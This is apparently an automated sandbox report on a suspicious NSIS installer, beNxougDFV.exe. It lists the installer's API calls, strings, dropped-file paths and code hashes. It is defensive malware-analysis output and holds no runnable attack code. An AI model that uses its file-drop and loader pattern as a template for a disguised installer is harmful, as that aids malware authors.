RegisterClassA.USER32(00422EA0), ref: 004039D8
DialogBoxParamA.USER32(?,00000000,00403B1C,00000000), ref: 004039F7

Strings

1033, xrefs: 0040379F, 004037F5
RichEdit20A, xrefs: 004039BA, 004039C0
RichEd20, xrefs: 0040399C
"C:\Users\user\Desktop\beNxougDFV.exe", xrefs: 00403783
: Completed, xrefs: 0040383D, 00403845, 00403852, 0040389C, 004038A2
.DEFAULT\Control Panel\International, xrefs: 004037E5
Control Panel\Desktop\ResourceLocale, xrefs: 004037B3
.exe, xrefs: 0040387C
RichEdit, xrefs: 004039C9
C:\Users\user\AppData\Local\Temp\, xrefs: 00403784
RichEd32, xrefs: 004039AA
Mongrelizes31 Setup: Completed, xrefs: 004037AB, 004037B1, 004037D6, 004037DF, 004037F4
_Nb, xrefs: 004038F2, 0040395A
C:\Users\user\AppData\Local\unshabbily, xrefs: 00403809, 00403811, 004038A9, 004038AF, 004038BF

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\beNxougDFV.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\unshabbily$Control Panel\Desktop\ResourceLocale$Mongrelizes31 Setup: Completed$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-2869279803
Opcode ID: 0f0f9529c3c60786d72211f980a5a8b1144e6e1ba4f9bbe45dc6703203a272d1
Instruction ID: d12dedd32edb2aff813830401e41f02ecd086126c72271397d80de36ce2b18ee
Opcode Fuzzy Hash: 0f0f9529c3c60786d72211f980a5a8b1144e6e1ba4f9bbe45dc6703203a272d1
Instruction Fuzzy Hash: 1E61C6B1744240BEE620BF669D45F373AACEB84759F40447EF940B22E2D77C9D029A2D

Function 00402D48 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402D59
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\beNxougDFV.exe,00000400), ref: 00402D75

Part of subcall function 00405AC8: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\beNxougDFV.exe,80000000,00000003), ref: 00405ACC
Part of subcall function 00405AC8: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AEE

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\beNxougDFV.exe,C:\Users\user\Desktop\beNxougDFV.exe,80000000,00000003), ref: 00402DC1

Strings

C:\Users\user\Desktop, xrefs: 00402DA3, 00402DA8, 00402DAE
Null, xrefs: 00402E3F
Inst, xrefs: 00402E2D
C:\Users\user\AppData\Local\Temp\, xrefs: 00402D4F
"C:\Users\user\Desktop\beNxougDFV.exe", xrefs: 00402D48
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F20
C:\Users\user\Desktop\beNxougDFV.exe, xrefs: 00402D5F, 00402D6E, 00402D82, 00402DA2
soft, xrefs: 00402E36
Error launching installer, xrefs: 00402D98

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\beNxougDFV.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\beNxougDFV.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-841657486
Opcode ID: 9cf78e836df077268a8f392ddbbc0cddc733458901816a9142e16d675eec763f
Instruction ID: ef8309496f7f1060f742aea9483ad6a943d4cc908664d4bedc23fec409a9c2f2
Opcode Fuzzy Hash: 9cf78e836df077268a8f392ddbbc0cddc733458901816a9142e16d675eec763f
Instruction Fuzzy Hash: F251D5B1A40215ABDF209F65DE89B9E7AB8FB04355F10413BE900B62D1C7BC9E418B9D

Function 00405F51 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 0040607C
GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,Completed,00000000,0040508E,Completed,00000000), ref: 0040608F
SHGetSpecialFolderLocation.SHELL32(0040508E,00000000,?,Completed,00000000,0040508E,Completed,00000000), ref: 004060CB
SHGetPathFromIDListA.SHELL32(00000000,: Completed), ref: 004060D9
CoTaskMemFree.OLE32(00000000), ref: 004060E5
lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406109
lstrlenA.KERNEL32(: Completed,?,Completed,00000000,0040508E,Completed,00000000,00000000,0040E8C0,00000000), ref: 0040615B

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406103
Completed, xrefs: 00405F76
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040604B
: Completed, xrefs: 00405F7B, 00406048, 00406049, 0040604A, 00406066, 0040607B, 0040608E, 004060AA, 004060D5, 00406108, 0040610E, 00406126, 00406139, 00406154, 0040615A, 00406162, 0040618C

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-905382516
Opcode ID: 4b83501bff14d3d4afc94545923638de13eab7723713207b83caa633bdf47479
Instruction ID: ad9c483c4d11e0ac1e74b91e3c17e9742ad78b5bc63621c1ce792900c2eda604
Opcode Fuzzy Hash: 4b83501bff14d3d4afc94545923638de13eab7723713207b83caa633bdf47479
Instruction Fuzzy Hash: 5361D0B1A00115ABDF209F64CD81BBA7BB4DB45304F15813FEA03BA2D2D27C4962DB5E

Function 00401759 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,307,C:\Users\user\AppData\Local\unshabbily,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,307,307,00000000,00000000,307,C:\Users\user\AppData\Local\unshabbily,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405F2F: lstrcpynA.KERNEL32(?,?,00000400,0040328D,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F3C

Part of subcall function 00405056: lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
Part of subcall function 00405056: lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
Part of subcall function 00405056: lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
Part of subcall function 00405056: SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
Part of subcall function 00405056: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
Part of subcall function 00405056: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
Part of subcall function 00405056: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112

Strings

open C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Hilltrot242.Boo, xrefs: 00401826, 00401842
C:\Users\user\AppData\Local\unshabbily, xrefs: 00401786
307, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: 307$C:\Users\user\AppData\Local\unshabbily$open C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Hilltrot242.Boo
API String ID: 1941528284-2442137438
Opcode ID: b7839a92209b7c6b3c8202a481ff6992844c1a0f6516a3d4c6bbc740c4310d88
Instruction ID: 5e97bff851cc073dc2a03fd3a0d2357d8c44b4856d4f0a7a75adeada814ade30
Opcode Fuzzy Hash: b7839a92209b7c6b3c8202a481ff6992844c1a0f6516a3d4c6bbc740c4310d88
Instruction Fuzzy Hash: 7A41E771A10516BACF107BA5DC86DAF3A78DF45369B20823BF525F11E1C63C8A418E6D

Function 00405056 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112

Strings

Completed, xrefs: 00405076, 00405088, 0040508E, 004050B1, 004050BD

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: 7a30fd5aa95a704ddc080644221cac8ba995af417aa6bdfbb55c98406b985727
Instruction ID: e673b9bb112aa3472437e231988a5d641118b75a6dbc9ddacfe4bdcedf5bb5e7
Opcode Fuzzy Hash: 7a30fd5aa95a704ddc080644221cac8ba995af417aa6bdfbb55c98406b985727
Instruction Fuzzy Hash: 49217A71A00508BBDF11DFA5DD80ADFBFA9EB08354F14807AF944A6291C2788A41CFA8

Function 0040551C Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040555F
GetLastError.KERNEL32 ref: 00405573
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405588
GetLastError.KERNEL32 ref: 00405592

Strings

C:\Users\user\Desktop, xrefs: 0040551C
C:\Users\user\AppData\Local\Temp\, xrefs: 00405542
ds@, xrefs: 00405551
ts@, xrefs: 00405522

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
API String ID: 3449924974-1471963312
Opcode ID: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
Instruction ID: 8a370a5fbdfdad71dc8e0bfd81c54348e454926cd11c3a1ff2f48966e6f5c6f5
Opcode Fuzzy Hash: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
Instruction Fuzzy Hash: D0010871D04259EAEF01DBA1CC447EFBBB9EB04354F00857AD904B6290E378A604CFAA

Function 00406259 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406270
wsprintfA.USER32 ref: 004062A9
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062BD

Strings

%s%s.dll, xrefs: 004062A3
\, xrefs: 00406281
UXTHEME, xrefs: 00406262

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
Instruction ID: 482dcefc063d93e198aa1db7e000bfd15e9281d4181d763578a6ff71fc22a1d9
Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
Instruction Fuzzy Hash: EAF0F630A10109AEDF14ABA4DD0DFFB375CAB08304F1405BAB64AE11D2E678E9248B69

Function 00402F81 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402FDF
GetTickCount.KERNEL32 ref: 00403060
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 0040308D
wsprintfA.USER32 ref: 0040309D

Strings

... %d%%, xrefs: 00403097

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 167b5ca0bfb3e57695ff9e62e4c69d0835ce9269e9eafab78b1523a358312806
Instruction ID: 60d675f18a734e15d0b5dd350d1cecbd4da5e6a0cde0341d3a53a3cb480860e8
Opcode Fuzzy Hash: 167b5ca0bfb3e57695ff9e62e4c69d0835ce9269e9eafab78b1523a358312806
Instruction Fuzzy Hash: FA519F71901219DBCB10EF65D9046AF7BB8AB04756F14413BF811B72C1C7789E51CBAA

Function 00405AF7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405B0B
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B25

Strings

nsa, xrefs: 00405B02
C:\Users\user\AppData\Local\Temp\, xrefs: 00405AFA
"C:\Users\user\Desktop\beNxougDFV.exe", xrefs: 00405AF7

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\beNxougDFV.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2487253352
Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
Instruction ID: d7521d4eade0cbd7120b41c29d2b11454b957a1e542ceee7a25420a70a1b98fd
Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
Instruction Fuzzy Hash: CFF082367082047BDB108F56DC04B9B7FA8DF91750F10803BFA08AA291D6B4B9558B69

Function 00401FFD Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028

Part of subcall function 00405056: lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
Part of subcall function 00405056: lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
Part of subcall function 00405056: lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
Part of subcall function 00405056: SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
Part of subcall function 00405056: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
Part of subcall function 00405056: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
Part of subcall function 00405056: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
GetProcAddress.KERNEL32(00000000,?), ref: 00402048
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 3ec78819d622ed86bae178855df993612b78117d9056a0a9d79db71722311b1c
Instruction ID: 772c7401ca61f63a6a86f526de26f8a62e510dd82d200dd974b96084c7de1680
Opcode Fuzzy Hash: 3ec78819d622ed86bae178855df993612b78117d9056a0a9d79db71722311b1c
Instruction Fuzzy Hash: 7F21DB71B04225B7CF207FA48E49B6E7A70AB44358F20413BFB15B22D0D7BD8942D65E

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00405960: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,?,004059CC,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040596E
Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405973
Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405987

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 0040551C: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040555F

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\unshabbily,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Local\unshabbily, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\unshabbily
API String ID: 1892508949-4280797776
Opcode ID: c3dc61fa4864d68a63a0ff324977f2f4971824b7823c1438af4a242a8e85a59c
Instruction ID: a466de0d3f6f2377f24be2a4188d25ee0cffe6e715a209702fc6e54bc549958f
Opcode Fuzzy Hash: c3dc61fa4864d68a63a0ff324977f2f4971824b7823c1438af4a242a8e85a59c
Instruction Fuzzy Hash: 78112731608151EBCF217FB54C415BF2AB0DA96324B28053FE8D1B22E2D63D4D429A3F

Function 00405E16 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,0040605A,80000002), ref: 00405E5C
RegCloseKey.KERNELBASE(?,?,0040605A,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,Completed), ref: 00405E67

Strings

: Completed, xrefs: 00405E19, 00405E4D

Memory Dump Source

Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

